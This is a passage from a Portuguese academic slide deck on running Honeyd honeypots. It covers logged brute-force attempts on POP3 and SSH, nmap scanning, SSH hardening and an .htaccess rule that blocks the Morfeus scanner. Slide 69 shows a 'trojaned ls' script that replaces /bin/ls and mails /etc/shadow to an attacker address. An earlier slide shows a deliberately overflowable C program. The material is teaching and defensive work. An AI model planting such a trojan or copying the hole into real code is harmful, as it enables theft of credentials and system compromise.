  43. 43. Prevenir ataques do Morfeus Scanner Uma maneira de bloquear este tipo de ataques vindos do MFS ´ e adicionar as seguintes linhas de c´digo no ficheiro “.htaccess” na o pasta do website. # Start of . htaccess change . RewriteEngine On RewriteCond %{ HTTP_USER_AGENT } ^ Morfeus RewriteRule ^.* $ - [ F ] # End of . htaccess change . Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  44. 44. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  45. 45. Tentativa de brute force no servidor POP3 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  46. 46. Tentativa de brute force no servidor POP3 ... -- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54678 ,110 , quot; USER root PASS root quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:49 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54729 ,110 , quot; USER root PASS root1 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:50 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54731 ,110 , quot; USER staff PASS staff quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:52 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER root PASS 12345 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:53 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER www PASS www quot;, -- ENDMARK - - ... Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  47. 47. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  48. 48. SSH Aqui est´ um gr´fico que mostra as tentativas de usernames: a a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  49. 49. SSH E o seguinte gr´fico mostra as tentativas de passwords: a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  50. 50. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  51. 51. A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  52. 52. Port scanning Descobrir m´quinas e respectivos portos a Cria¸˜o de pacotes personalizados ca Dificil de dominar NMap - insecure.org Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  53. 53. Port scanning Open ou Accepted: A m´quina enviou uma resposta a indicar a que um servi¸o est´ a escutar aquele porto; c a Closed, Denied ou Not Listening : A m´quina enviou uma a resposta a indicar que qualquer conex˜o no porto ser´ negada; a a Filtered, Dropped ou Blocked: N˜o houve resposta por parte a da m´quina. a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  54. 54. Port scanning Tipos de t´cnicas e TCP/SYN TCP Connect UDP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  55. 55. TCP Connect Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  56. 56. Port scanning Optimiza¸˜o ca golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24 ... Nmap finished : 256 IP addresses (29 hosts up ) scanned in 2033.375 seconds golden@golden - laptop :~ $ sudo nmap - sS - sV - P0 192.168.100.0/24 ... Nmap finished : 256 IP addresses (32 hosts up ) scanned in 2038.191 seconds Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  57. 57. Ataque For¸a bruta / Dicion´rios c a Explora¸˜o de vulnerabilidades ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  58. 58. SSH Porto 22 Atacado em For¸a bruta / Dicion´rios c a cat /var/log/auth.log Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  59. 59. SSH - log Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from 89.235.152.18 Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:24:48 golden - laptop sshd [23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2 Dec 24 01:24:49 golden - laptop sshd [23908]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:01 golden - laptop sshd [23963]: Invalid user test from 89.235.152.18 Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:04 golden - laptop sshd [23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2 Dec 24 01:26:05 golden - laptop sshd [23965]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:21 golden - laptop sshd [23975]: Invalid user cvsuser from 89.235.152.18 Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:22 golden - laptop sshd [23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2 Dec 24 01:26:24 golden - laptop sshd [23977]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  60. 60. SSH Defesa: IPTables passwords mais fortes Autentica¸˜o RSA ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  61. 61. SSH password m´ ınimo de 8 caracteres password nao triviais combina¸˜es alfanum´ricas co e mnem´nica: “Um Whiskey-Cola vale 3 euros no BA!” = o “UW-Cv3enBA!” Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  62. 62. SSH http://www.passwordmeter.com/ Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  63. 63. SSH - Autentica¸˜o RSA ca Geramos o par de chaves com o comando “ssh-keygen -t rsa”. 1 De seguida s˜o criados os ficheiros /.ssh/id rsa (chave a privada) e /.ssh/id rsa.pub (chave p´blica) u Em cada m´quina onde nos quisermos ligar (destino), a 2 colocamos a “id rsa.pub” gerada em /.ssh/authorized keys concatenando o conte´do desta forma por exemplo: “cat u id rsa.pub >> /.ssh/authorized keys” Em cada m´quina de onde nos quisermos ligar (origem), a 3 colocamos a “id rsa” em /.ssh/ S´ falta desactivar o login baseado em password ao adicionar o 4 a linha “PasswordAuthentication no” em /etc/ssh/sshd config e de seguida fazer restart ao daemon “sshd” atrav´s de e “/etc/init.d/sshd restart”. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  64. 64. Vulnerabilidades Comportamento n˜o previsto num artefacto de software a Buffer Overflow Input n˜o validado a SQL Injection Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  65. 65. Explora¸˜o de vulnerabilidades ca Exploit ´ E a designa¸˜o dada a um peda¸o de c´digo que serve para ca c o explorar falhas em aplica¸˜es de forma a causarem um co comportamento pr´viamente n˜o antecipado nas mesmas. e a # include < stdio .h > # include < string .h > int main ( int argc , char * argv []) { char buffer [10]; strcpy ( buffer , argv [1]) ; printf ( buffer ) ; return 0; } Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  66. 66. Buffer Overflow user@honeypot :~ $ gcc exploit . c -o exploit user@honeypot :~ $ ./ exploit thisisanexploit *** stack smashing detected ***: ./ exploit terminated thisisanexploitAborted Um dos mecanismos de defesa do gcc Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  67. 67. ShellCode Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o) co o a a desenvolvidas de maneira a que possam ser injectadas numa aplica¸˜o em tempo de execu¸˜o. ca ca Acesso ilegal a espa¸o de mem´ria n˜o autorizado c o a Injec¸˜o do shellcode ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  68. 68. RootKits Conjunto de programas malicionsos (trojans, backdoors chkrootkit e rkhunter (Linux)1 ; RootkitRevealer (Windows). 1 Ambos dispon´ ıveis no gestor de pacotes do Ubuntu. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  69. 69. Trojaned ls #!/ bin / bash mv / bin / ls / bin / ls . old / bin / echo quot; cat / etc / shadow | mail intruso@intruso . pt quot; > / bin / ls / bin / echo quot;/ bin / ls . old quot; >> / bin / ls chmod + x / bin / ls Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  70. 70. Conclus˜o a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×